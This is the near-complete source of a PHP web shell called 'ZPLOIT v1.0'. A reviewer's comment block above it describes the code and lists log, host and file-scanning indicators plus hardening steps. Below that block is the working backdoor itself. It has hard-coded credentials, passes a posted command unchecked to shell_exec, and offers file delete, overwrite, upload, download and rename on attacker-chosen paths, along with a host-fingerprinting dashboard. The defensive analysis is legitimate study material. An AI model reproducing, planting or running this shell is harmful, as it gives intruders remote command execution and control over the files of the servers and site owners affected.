// NOTE(review): this listing is a PHP web shell (it titles itself "ZPLOIT v1.0"): a
// single-file backdoor that gives whoever can reach it a file manager and a command
// prompt running with the privileges of the PHP process. The PHP open/close tags and
// most of the form markup appear to have been lost when the page was extracted, so the
// text below is kept verbatim for analysis and is not valid PHP as shown.
//
// What the code does, in order:
//   - Login gate: POST fields `u`/`p` are compared (via sha1) with the hard-coded
//     $USER/$PASS. On success $_SESSION['auth'] is set to sha1($PASS.session_id()); on
//     failure the client is redirected to `?msg=fail`. Requests without a matching
//     session value get the login page and the script exits.
//   - `action=logout` destroys the session.
//   - Response headers are set to `X-Powered-By: NONE` and `Server: Not-Apache`.
//   - The working directory and every target path come from the client, base64-encoded
//     in the GET parameters `d`, `delete`, `edit`, `rename` and `download`.
//   - File operations: recursive delete (del_tree), rename, overwrite through
//     file_put_contents, upload through move_uploaded_file, download through readfile.
//     The only gate is checkPermission(), which just asks whether the PHP process
//     itself can read/write/execute the path (is_readable/is_writable/is_executable).
//   - Command execution: $_POST['cmd'] is passed unmodified to shell_exec() and the
//     output is echoed back HTML-escaped.
//   - A dashboard prints php_uname(), server software, PHP version, the process owner
//     with uid/gid, the current directory and its mode, and client/server addresses.
//
// Detection and response pointers for defenders:
//   - Web logs: repeated requests to one PHP file carrying base64 values in `d`,
//     `delete`, `edit`, `rename` or `download`, and redirects to `?msg=fail` or
//     `?d=...&msg=...`. POST fields (`u`, `p`, `cmd`, `action`, `path`, `new_name`,
//     `content`) are usually not in access logs, so the GET side is the steadier signal.
//   - Host telemetry: the web server / PHP worker spawning shell child processes, and
//     that same account deleting, renaming or rewriting files outside its normal paths.
//   - File scanning: the literal strings here (titles, banner, credentials) are trivial
//     to change, so treat them as weak indicators; request data flowing into
//     shell_exec(), file_put_contents() or move_uploaded_file() in a web-root file is
//     the more durable pattern to match on.
//   - Hardening that blunts this class of file: a web root the PHP account cannot write
//     to, no PHP execution in upload directories, and shell_exec and its siblings listed
//     in the `disable_functions` ini directive where the application does not need them.
//   - Finding this file on a host means something already had write access to the web
//     root: identify how it was written, and treat everything readable or writable by
//     the PHP account as exposed.
ob_start();$PASS = 'zploit';$USER = 'zploit';session_start();if(isset($_POST['p']) && isset($_POST['u'])){ if(sha1($_POST['p']) === sha1($PASS) && sha1($_POST['u']) === sha1($USER)){ $_SESSION['auth'] = sha1($PASS.session_id()); } else { header('Location: ?msg=fail'); exit; }}if(!isset($_SESSION['auth']) || $_SESSION['auth'] !== sha1($PASS.session_id())){Zploit Login echo '<!DOCTYPE html><title>Zploit Login</title><style>body{background:#000;color:#0f0;font-family:monospace;}input{background:#111;color:#0f0;border:1px solid #0f0;}input[type="submit"]{background:#0a0;color:#000;border:none;padding:5px 10px;cursor:pointer;}</style>'; echo '



'; echo '
'; echo '

▓▒░ ZPLOIT ACCESS ░▒▓

'; echo 'USER:

'; echo 'PASS:


'; echo ''; echo '
'; echo '
'; echo ''; ob_end_flush(); exit;}if(isset($_POST['action']) && $_POST['action'] == 'logout'){ session_destroy(); header('Location: ?'); exit;}header('X-Powered-By: NONE');header('Server: Not-Apache');header('Content-Type: text/html; charset=UTF-8');header('Cache-Control: no-cache, must-revalidate');$dir = isset($_GET['d']) ? base64_decode($_GET['d']) : getcwd();$dir = str_replace('\\', '/', $dir);if(substr($dir, -1) != '/'){ $dir .= '/'; }function checkPermission($path, $type = 'write') { if (!file_exists($path)) return false; if ($type == 'write' || $type == 'rename' || $type == 'delete') { return is_writable($path); } if ($type == 'read') { return is_readable($path); } if ($type == 'execute') { return is_executable($path); } return false;}if(isset($_GET['delete'])){ $path = base64_decode($_GET['delete']); $msg = ''; if(is_file($path) || is_dir($path)){ if(checkPermission($path, 'delete')){ if(is_dir($path)){ function del_tree($dir) { $files = array_diff(scandir($dir), array('.','..')); foreach ($files as $file) { (is_dir("$dir/$file")) ? del_tree("$dir/$file") : unlink("$dir/$file"); } return rmdir($dir); } del_tree($path); $msg = '▓ DELETED: '.basename($path); } else { unlink($path); $msg = '▓ DELETED: '.basename($path); } } else { $msg = '▓ ACCESS DENIED: '.basename($path); } } else { $msg = '▓ PATH NOT FOUND'; } header('Location: ?d='.base64_encode($dir).'&msg='.urlencode($msg)); exit;}if(isset($_POST['action'])){ $action = $_POST['action']; $path = $_POST['path']; $new_name = isset($_POST['new_name']) ? $_POST['new_name'] : ''; $content = isset($_POST['content']) ? $_POST['content'] : ''; $msg = ''; switch($action){ case 'rename': if(checkPermission($path, 'rename')){ $new_path = dirname($path) . '/' . $new_name; if(checkPermission(dirname($path), 'write')){ if(rename($path, $new_path)){ $msg = '▓ RENAMED: '.basename($path).' 
→ '.$new_name; } else { $msg = '▓ RENAME FAILED'; } } else { $msg = '▓ PERMISSION DENIED'; } } else { $msg = '▓ PERMISSION DENIED: '.basename($path); } break; case 'edit_save': if(checkPermission($path, 'write')){ if(file_put_contents($path, $content) !== false){ $msg = '▓ SAVED: '.basename($path); } else { $msg = '▓ SAVE FAILED'; } } else { $msg = '▓ PERMISSION DENIED: '.basename($path); } break; case 'upload': if(checkPermission($dir, 'write')){ if(isset($_FILES['file']) && $_FILES['file']['error'] == UPLOAD_ERR_OK){ $target = $dir . basename($_FILES['file']['name']); if(move_uploaded_file($_FILES['file']['tmp_name'], $target)){ $msg = '▓ UPLOADED: '.basename($_FILES['file']['name']); } else { $msg = '▓ UPLOAD FAILED'; } } else { $msg = '▓ UPLOAD ERROR'; } } else { $msg = '▓ PERMISSION DENIED'; } break; } header('Location: ?d='.base64_encode($dir).'&msg='.urlencode($msg)); exit;}$upload_enabled = checkPermission($dir, 'write');<!DOCTYPE html>ZPLOIT v1.0 <title>ZPLOIT v1.0</title> <style> * { margin: 0; padding: 0; box-sizing: border-box; } body { background: #000; color: #0f0; font-family: 'Courier New', monospace; font-size: 13px; margin: 0; padding: 0; overflow-x: hidden; } ::selection { background: #0f0; color: #000; } .blink { animation: blink 1s infinite; } @keyframes blink { 0%, 100% { opacity: 1; } 50% { opacity: 0; } } .container { padding: 10px; } .header { background: #111; padding: 8px 10px; border-bottom: 2px solid #0f0; border-top: 2px solid #0f0; margin-bottom: 10px; position: relative; } .header:before { content: "▓▒░"; color: #0a0; margin-right: 10px; } .header:after { content: "░▒▓"; color: #0a0; margin-left: 10px; } .path-navigation { display: inline-block; margin-left: 10px; } .path-segment { color: #0ff; text-decoration: none; cursor: pointer; padding: 1px 4px; } .path-segment:hover { background: #0f0; color: #000; } .path-separator { color: #0a0; margin: 0 3px; } .cmd_form input[type="text"] { background: #111; color: #0f0; border: 1px solid 
#0a0; width: 500px; padding: 5px; font-family: 'Courier New', monospace; font-size: 13px; } .cmd_form input[type="submit"] { background: #0a0; color: #000; border: none; padding: 5px 15px; cursor: pointer; font-family: 'Courier New', monospace; font-weight: bold; font-size: 13px; } .sys-box { background: #111; border: 1px solid #0a0; margin: 15px 0; padding: 0; position: relative; } .sys-title { background: #0a0; color: #000; padding: 4px 8px; font-weight: bold; border-bottom: 1px solid #0f0; } .sys-content { padding: 10px; line-height: 1.4; } .sys-line { margin: 3px 0; padding: 2px 0; border-bottom: 1px dotted #222; } .sys-label { color: #0ff; display: inline-block; width: 150px; font-weight: bold; } .sys-value { color: #0f0; } .sys-value:before { content: ">"; color: #0a0; margin-right: 5px; } .permission-dot { display: inline-block; width: 8px; height: 8px; border-radius: 50%; margin-left: 5px; } .perm-yes { background: #0f0; box-shadow: 0 0 5px #0f0; } .perm-no { background: #f00; box-shadow: 0 0 5px #f00; } .file_table { width: 100%; border-collapse: collapse; margin: 10px 0; border: 1px solid #0a0; } .file_table th { background: #0a0; color: #000; padding: 8px; text-align: left; font-weight: bold; border-bottom: 2px solid #0f0; } .file_table td { padding: 6px 8px; border-bottom: 1px solid #222; } .file_table tr:hover { background: #111; } .dir_row { background: #001; } .file_row { background: #000; } .msg { background: #300; color: #f88; padding: 8px; margin: 10px 0; border: 1px solid #f00; border-left: 5px solid #f00; } .msg-success { background: #030; color: #8f8; border: 1px solid #0f0; border-left: 5px solid #0f0; } .edit_area { width: 100%; height: 400px; background: #111; color: #0f0; border: 2px solid #0a0; padding: 10px; font-family: 'Courier New', monospace; font-size: 13px; resize: vertical; } .btn { background: #0a0; color: #000; border: none; padding: 5px 12px; cursor: pointer; font-family: 'Courier New', monospace; font-weight: bold; font-size: 
12px; text-decoration: none; display: inline-block; margin: 2px; } .btn:hover { background: #0f0; } .btn-disabled { background: #333; color: #666; cursor: not-allowed; } .action-link { background: #222; color: #0ff; border: 1px solid #0a0; padding: 3px 8px; text-decoration: none; display: inline-block; margin: 0 3px; font-size: 11px; } .action-link:hover { background: #0a0; color: #000; } .action-link-disabled { background: #333; color: #666; border: 1px solid #666; cursor: not-allowed; } .delete-link { background: #300; color: #f88; border: 1px solid #f00; } .delete-link:hover { background: #f00; color: #000; } .glitch { position: relative; } .glitch:before { content: attr(data-text); position: absolute; left: -1px; text-shadow: 1px 0 #f0f; background: #000; overflow: hidden; clip: rect(0, 900px, 0, 0); animation: glitch-1 2s infinite linear alternate-reverse; } @keyframes glitch-1 { 0% { clip: rect(42px, 9999px, 44px, 0) } 5% { clip: rect(12px, 9999px, 59px, 0) } 10% { clip: rect(48px, 9999px, 29px, 0) } 15% { clip: rect(42px, 9999px, 73px, 0) } 20% { clip: rect(63px, 9999px, 27px, 0) } 25% { clip: rect(34px, 9999px, 55px, 0) } 30% { clip: rect(86px, 9999px, 73px, 0) } 35% { clip: rect(20px, 9999px, 20px, 0) } 40% { clip: rect(26px, 9999px, 60px, 0) } 45% { clip: rect(25px, 9999px, 66px, 0) } 50% { clip: rect(57px, 9999px, 98px, 0) } 55% { clip: rect(5px, 9999px, 46px, 0) } 60% { clip: rect(82px, 9999px, 31px, 0) } 65% { clip: rect(54px, 9999px, 27px, 0) } 70% { clip: rect(28px, 9999px, 99px, 0) } 75% { clip: rect(45px, 9999px, 69px, 0) } 80% { clip: rect(23px, 9999px, 85px, 0) } 85% { clip: rect(54px, 9999px, 84px, 0) } 90% { clip: rect(45px, 9999px, 47px, 0) } 95% { clip: rect(37px, 9999px, 20px, 0) } 100% { clip: rect(4px, 9999px, 91px, 0) } } h1, h2, h3 { color: #0ff; margin: 10px 0; padding-bottom: 5px; border-bottom: 1px dashed #0a0; } h1:before, h2:before { content: "▓ "; color: #0f0; } hr { border: none; height: 1px; background: linear-gradient(to right, 
transparent, #0a0, transparent); margin: 20px 0; } </style><div class="header"> <span class="glitch" data-text="ZPLOIT v1.0">ZPLOIT v1.0</span> | <span class="path-navigation"> $path_parts = explode('/', trim($dir, '/')); $current_path = ''; echo '<a href="?d=' . base64_encode('/') . '" class="path-segment">ROOT</a>'; foreach ($path_parts as $part) { if (!empty($part)) { $current_path .= '/' . $part; echo '<span class="path-separator">/</span>'; echo '<a href="?d=' . base64_encode($current_path . '/') . '" class="path-segment">' . htmlspecialchars($part) . '</a>'; } } </span>
</div><div class="container"> if(isset($_GET['msg'])): <div class="msg echo (strpos($_GET['msg'], '▓ DELETED') !== false || strpos($_GET['msg'], '▓ SAVED') !== false || strpos($_GET['msg'], '▓ UPLOADED') !== false || strpos($_GET['msg'], '▓ RENAMED') !== false) ? 'msg-success' : ''; "> <span class="blink">!</span> echo htmlspecialchars(urldecode($_GET['msg'])); </div> endif; <div class="sys-box"> <div class="sys-title"># SYSTEM DASHBOARD</div> <div class="sys-content"> <div class="sys-line"><span class="sys-label">KERNEL</span><span class="sys-value"> echo php_uname('s') . ' ' . php_uname('r') . ' ' . php_uname('m'); </span></div> <div class="sys-line"><span class="sys-label">SOFTWARE</span><span class="sys-value"> echo $_SERVER['SERVER_SOFTWARE'] ?? 'N/A'; </span></div> <div class="sys-line"><span class="sys-label">PHP VERSION</span><span class="sys-value"> echo phpversion(); </span></div> <div class="sys-line"><span class="sys-label">USER ID</span><span class="sys-value"> echo get_current_user() . ' [' . getmyuid() . ':' . getmygid() . ']'; </span></div> <div class="sys-line"><span class="sys-label">LOCATION</span><span class="sys-value"> echo $dir; </span></div> <div class="sys-line"><span class="sys-label">PERMISSIONS</span><span class="sys-value"> echo substr(sprintf('%o', fileperms($dir)), -4); <span class="permission-dot echo checkPermission($dir, 'read') ? 'perm-yes' : 'perm-no'; "></span> <span class="permission-dot echo checkPermission($dir, 'write') ? 'perm-yes' : 'perm-no'; "></span> <span class="permission-dot echo checkPermission($dir, 'execute') ? 'perm-yes' : 'perm-no'; "></span> </span></div> <div class="sys-line"><span class="sys-label">NETWORK</span><span class="sys-value"> echo $_SERVER['REMOTE_ADDR'] ?? '127.0.0.1'; → echo $_SERVER['SERVER_ADDR'] ?? 'N/A'; </span></div> <div class="sys-line"><span class="sys-label">RESOURCES</span><span class="sys-value"> echo ini_get('memory_limit') . ' | ' . ini_get('upload_max_filesize') . ' | ' . 
ini_get('max_execution_time') . 's'; </span></div> </div></div>

COMMAND TERMINAL

<hr>if(isset($_POST['cmd'])): echo '<div class="sys-box">'; echo '<div class="sys-title"># COMMAND OUTPUT</div>'; echo '<div class="sys-content"><pre>'; echo htmlspecialchars(shell_exec($_POST['cmd'])); echo '</pre></div></div>';endif;if(isset($_GET['edit'])){ $file_path = base64_decode($_GET['edit']); if(is_file($file_path)){ $can_edit = checkPermission($file_path, 'write'); if($can_edit){ $content = file_get_contents($file_path); echo '<div class="sys-box">'; echo '<div class="sys-title"># EDIT FILE: ' . basename($file_path) . '</div>'; echo '<div class="sys-content">'; echo '
'; echo ''; echo ''; echo '<textarea name="content" class="edit_area">'.htmlspecialchars($content).'</textarea>

'; echo ''; echo ' <a href="?d='.base64_encode($dir).'" class="btn">[ CANCEL ]</a>'; echo '
</div></div>'; } else { echo '<div class="msg">▓ PERMISSION DENIED: Cannot edit ' . basename($file_path) . '</div>'; echo '<a href="?d='.base64_encode($dir).'" class="btn">[ BACK ]</a>'; } } else { echo '<div class="msg">▓ FILE NOT FOUND</div>'; } echo '</div>'; ob_end_flush(); exit;}if(isset($_GET['rename'])){ $file_path = base64_decode($_GET['rename']); $can_rename = checkPermission($file_path, 'rename') && checkPermission(dirname($file_path), 'write'); if($can_rename){ echo '<div class="sys-box">'; echo '<div class="sys-title"># RENAME: ' . basename($file_path) . '</div>'; echo '<div class="sys-content">'; echo '
'; echo ''; echo ''; echo 'NEW NAME:

'; echo ''; echo ' <a href="?d='.base64_encode($dir).'" class="btn">[ CANCEL ]</a>'; echo '
</div></div>'; } else { echo '<div class="msg">▓ PERMISSION DENIED: Cannot rename ' . basename($file_path) . '</div>'; echo '<a href="?d='.base64_encode($dir).'" class="btn">[ BACK ]</a>'; } echo '</div>'; ob_end_flush(); exit;}if(isset($_GET['download'])){ $file_path = base64_decode($_GET['download']); if(is_file($file_path) && is_readable($file_path)){ header('Content-Description: File Transfer'); header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename="'.basename($file_path).'"'); header('Expires: 0'); header('Cache-Control: must-revalidate'); header('Pragma: public'); header('Content-Length: ' . filesize($file_path)); readfile($file_path); ob_end_flush(); exit; } else { echo '<div class="msg">▓ FILE NOT FOUND OR NOT READABLE</div>'; }}

FILE SYSTEM

<table class="file_table"><thead> <th>TYPE</th> <th>NAME</th> <th>SIZE</th> <th>PERMS</th> <th>WRITE</th> <th>ACTIONS</th> </thead><tbody>$parent_dir = dirname($dir);if($parent_dir != $dir){ echo '<tr class="dir_row"><td colspan="6"><a href="?d='.base64_encode($parent_dir).'" class="btn">[ .. PARENT ]</a>';}$items = @scandir($dir);if($items !== false){ foreach($items as $item){ if($item == '.' || $item == '..'){ continue; } $path = $dir . $item; $is_dir = is_dir($path); $perms = substr(sprintf('%o', fileperms($path)), -4); $size = $is_dir ? 'DIR' : round(filesize($path)/1024, 2) . ' KB'; $writable = checkPermission($path, 'write'); $readable = checkPermission($path, 'read'); echo '<tr class="'.($is_dir ? 'dir_row' : 'file_row').'">'; echo ''.($is_dir ? '📁' : '📄').''; echo ''.($is_dir ? '<a href="?d='.base64_encode($path).'">' : '').'<strong>'.htmlspecialchars($is_dir ? '['.$item.']' : $item).'</strong>'.($is_dir ? '</a>' : '').''; echo ''.$size.''; echo ''.$perms.''; echo '<span class="permission-dot '.($writable ? 'perm-yes' : 'perm-no').'"></span>'; echo ''; if(!$is_dir){ echo $writable ? '<a href="?edit='.base64_encode($path).'&d='.base64_encode($dir).'" class="action-link">EDIT</a>' : '<span class="action-link-disabled">EDIT</span>'; echo $readable ? '<a href="?download='.base64_encode($path).'" class="action-link">DL</a>' : '<span class="action-link-disabled">DL</span>'; } echo $writable && checkPermission(dirname($path), 'write') ? '<a href="?rename='.base64_encode($path).'&d='.base64_encode($dir).'" class="action-link">RN</a>' : '<span class="action-link-disabled">RN</span>'; echo $writable ? '<a href="?delete='.base64_encode($path).'&d='.base64_encode($dir).'" onclick="return confirm(\'Delete '.htmlspecialchars($item).'?\')" class="action-link delete-link">DEL</a>' : '<span class="action-link-disabled">DEL</span>'; echo ''; echo ''; }} else { echo '<td colspan="6"><div class="msg">▓ ACCESS DENIED - Directory not readable</div>';}</tbody><hr>

FILE UPLOAD

if($upload_enabled): <div class="sys-box"> <div class="sys-title"># UPLOAD TO: echo htmlspecialchars($dir); </div> <div class="sys-content">
</div></div> else: <div class="msg">▓ PERMISSION DENIED - Cannot upload to this directory</div> endif; </div>ob_end_flush();